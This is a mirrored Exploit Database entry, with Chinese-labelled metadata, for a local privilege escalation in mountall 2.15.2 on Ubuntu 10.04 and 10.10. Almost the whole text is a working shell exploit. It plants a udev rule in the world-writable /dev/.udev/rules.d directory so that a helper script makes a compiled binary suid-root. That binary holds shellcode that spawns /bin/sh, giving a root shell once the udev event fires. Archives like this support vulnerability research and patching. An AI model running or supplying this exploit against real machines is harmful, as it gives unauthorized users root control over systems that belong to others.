mountall 2.15.2 (Ubuntu 10.04/10.10) – Local Privilege Escalation

• Exploit Database
• 39 阅读

• 作者： fuzz
  日期： 2010-09-21
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/15074/

• # source: https://www.securityfocus.com/bid/43084/info
  
  #!/bin/sh
  # by fuzz. For Anux inc. #
  # ubuntu 10.04 , 10.10
  if [ -z "$1" ]
  then
  echo "usage: $0 <UDEV KERNEL EVENT>"
  echo "see here http://www.reactivated.net/writing_udev_rules.html"
  exit
  fi
  cat > usn985-exploit.sh << EOF
  #!/bin/sh
  chown root:root $PWD/usn985-sc
  chmod +s $PWD/usn985-sc
  EOF
  cat > usn985-sc.c << EOF
  char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
  "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
  main(){int *r;*((int *)&r+2)=(int)s;}
  EOF
  gcc usn985-sc.c -o usn985-sc
  echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
  chmod +x usn985-exploit.sh
  echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
  echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"